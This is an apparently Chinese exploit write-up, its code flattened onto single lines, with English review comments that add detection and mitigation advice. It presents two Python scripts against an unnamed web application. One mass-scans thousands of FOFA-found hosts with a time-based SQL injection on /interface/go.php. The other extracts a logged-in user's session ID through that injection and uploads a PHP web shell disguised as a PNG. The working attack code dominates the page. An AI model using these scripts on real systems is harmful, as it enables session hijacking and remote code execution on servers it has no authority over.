目录
批量检测:
稍微改动下,getshell脚本:
脚本用 Python 编写;用它检测 FOFA 上检索到的 4000 个目标,其中 1200 多个被判定为存在漏洞:
批量检测:
# NOTE(review): the page extraction flattened this listing onto one line. Because the
# line opens with the "#" of the coding cookie, Python reads all of it as a comment;
# it is kept byte-for-byte below as the author published it.
#
# What the visible text does:
#   * isLogin(host) sends one GET to {host}/interface/go.php whose APP_UNIT parameter
#     carries a double-URL-encoded UNION SELECT with IF(<count of user_online rows> = 0,
#     sleep(20), 1), using a 10 s client timeout. A read timeout returns False; any
#     response that arrives within the timeout returns True.
#   * GetSession(url), wrapped in vthread.pool(10), appends every host for which
#     isLogin() returned True to a local text file.
#   * The __main__ part reads a file name from stdin and feeds each line to GetSession,
#     prefixing "http://" when the line does not contain "http".
#
# Accuracy caveat: True only means "answered within 10 s". A host that does not run the
# affected application, or that is already patched, is recorded as well, so the result
# file (and the 1200+ figure quoted on this page) is not proof of vulnerable hosts.
# Only ReadTimeout is caught; other request errors are not handled in the visible code.
#
# Detection ideas for defenders (all taken from the request shown here):
#   * access-log / WAF entries for /interface/go.php where APP_UNIT, after one or two
#     rounds of URL decoding, contains "union", "select", "sleep(" or "user_online";
#   * responses on that endpoint that take roughly 20 s;
#   * the same source hitting many hosts with an identical query string.
# Mitigation: install the vendor fix for the affected product (not named on this page),
# do not expose the application directly to the internet, and bind APP_UNIT as a query
# parameter instead of concatenating it into SQL.
# -*- coding: utf-8 -*-import requests,sysimport argparseimport urllib3import sslimport vthreadurllib3.disable_warnings()ssl._create_default_https_context = ssl._create_unverified_contextheaders = {"Content-Type":"application/x-www-form-urlencoded"}session = ""def isLogin(host):try:r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)return Trueexcept requests.exceptions.ReadTimeout:return False@vthread.pool(10)def GetSession(url):global sessionif isLogin(url):print("存在用户登录......")with open('純在漏洞.txt',"a") as a: #设置文件对象str = a.write(url + "\n")else:print("没有用户登录")if __name__ == "__main__":f = open(input()) lines = f.readlines()for line in lines:line = line.strip()if "http" not in line:line = "http://" + lineGetSession(line)
稍微改动下,getshell脚本:
# NOTE(review): the page extraction flattened this listing onto two lines (the break
# falls inside the help string of the -u option). It is kept byte-for-byte below and is
# not valid Python in this form.
#
# What the visible text does, in three stages:
#   1. isLogin(host): the same time-based probe of /interface/go.php as in the
#      batch-check listing (10 s timeout; read timeout -> False, otherwise True).
#   2. GetSession(url): for positions 0..26 and character codes 48..127 it requests
#      go.php with IF(ascii(mid((select sid from user_online limit 0,1), pos, 1)) = code,
#      sleep(20), 1) and an 18 s timeout. A read timeout is taken as a match and the
#      character is appended to the module-level `session` string.
#   3. upload(url, file): returns early if `session` is shorter than 20 characters;
#      otherwise POSTs the local file as multipart field FILE1, file name 'shell.php. ',
#      content type image/png, to /general/reportshop/utils/upload.php
#      ?action=upload&filetype=xls with the header cookie: PHPSESSID=<session>.
#      If the response text contains "true", the script reports the file under
#      \attachment\reportshop\templates\shell.php on port 8750.
#
# Impact as shown: the session id of a currently logged-in user is read through the SQL
# injection and then reused to store a server-side script through the upload endpoint.
# NOTE(review): the trailing ". " in the uploaded name presumably gets past an extension
# check while the stored file ends in .php - inferred from the success message, not
# visible in this code.
#
# Detection ideas for defenders:
#   * long runs of /interface/go.php requests from one source whose decoded APP_UNIT
#     contains "ascii(mid(" with a changing position and code, some taking ~20 s;
#   * multipart POSTs to /general/reportshop/utils/upload.php whose filename ends in a
#     dot or a space, or whose extension does not match the declared content type;
#   * new .php files under attachment\reportshop\templates;
#   * a PHPSESSID value suddenly used from a second client address.
# Mitigation: install the vendor fix for the affected product (not named on this page),
# invalidate active sessions afterwards, normalise file names (strip trailing dots and
# spaces) before checking the extension against an allow-list, and serve the upload
# directory without script execution.
# -*- coding: utf-8 -*-import requests,sysimport argparseimport urllib3import sslurllib3.disable_warnings()ssl._create_default_https_context = ssl._create_unverified_contextheaders = {"Content-Type":"application/x-www-form-urlencoded"}session = ""def isLogin(host):try:r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)return Trueexcept requests.exceptions.ReadTimeout:return Falsedef GetSession(url):global sessionif isLogin(url):print("存在用户登录......")for i in range(27):for x in range(48,128):sql = "{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if(ascii(mid((select sid from user_online limit 0%252c1)%252c{mid}%252c1))={ascii}%252csleep(20)%252c1)+%23%25%252727".format(url=url, mid=i, ascii=x)try:r = requests.get(url = sql,timeout=18,headers=headers)except requests.exceptions.ReadTimeout:print("编码:"+str(x))print("sql:"+sql)session += chr(x)breakprint("session:"+session)print("--------------------------------------------------------")print("OK:",session)else:print("没有用户登录")def upload(url,file):if len(session) < 20:print("session不完整,请重新获取....")returnwith open(file,"rb") as file:print("开始上传文件...")file = [('FILE1',('shell.php. ',file,'image/png'))]r = requests.post(url="{url}/general/reportshop/utils/upload.php?action=upload&filetype=xls".format(url=url),headers={"cookie":"PHPSESSID="+session},files=file)if "true" in r.text:print("上传成功,shell地址:8750端口 \\attachment\\reportshop\\templates\\shell.php")else:print(r.text)if __name__ == "__main__":Usage = 'python3 1.py -u url -f file'parser = argparse.ArgumentParser(description = Usage)parser.add_argument('-u', '--url', type=str, required=True, help='e.g. The website home page. 
172.16.203.147')parser.add_argument('-f', '--file', type=str, required=True, help='Path to ')args = parser.parse_args()url = args.urlfile = args.fileGetSession(url)upload(url,file)